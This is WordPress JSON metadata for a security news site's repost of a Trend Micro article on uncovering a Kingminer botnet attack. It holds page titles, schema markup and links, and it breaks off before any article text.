Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/","og_locale":"en_US","og_type":"article","og_title":"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-05-18T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/KingminerThumbResized.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR","datePublished":"2022-05-18T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/"},"wordCount":1464,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Exploits&Vulnerabilities","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/","url":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/","name":"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr.png","datePublished":"2022-05-18T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr.png","width":706,"height":520},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46701","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=46701"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46701\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/46702"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=46701"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=46701"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=46701"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":46701,"date":"2022-05-18T00:00:00","date_gmt":"2022-05-18T00:00:00","guid":{"rendered":"urn:uuid:48489dfe-b0c2-a5ed-3f83-3d1512c3e8b0"},"modified":"2022-05-18T00:00:00","modified_gmt":"2022-05-18T00:00:00","slug":"uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/","title":{"rendered":"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR"},"content":{"rendered":"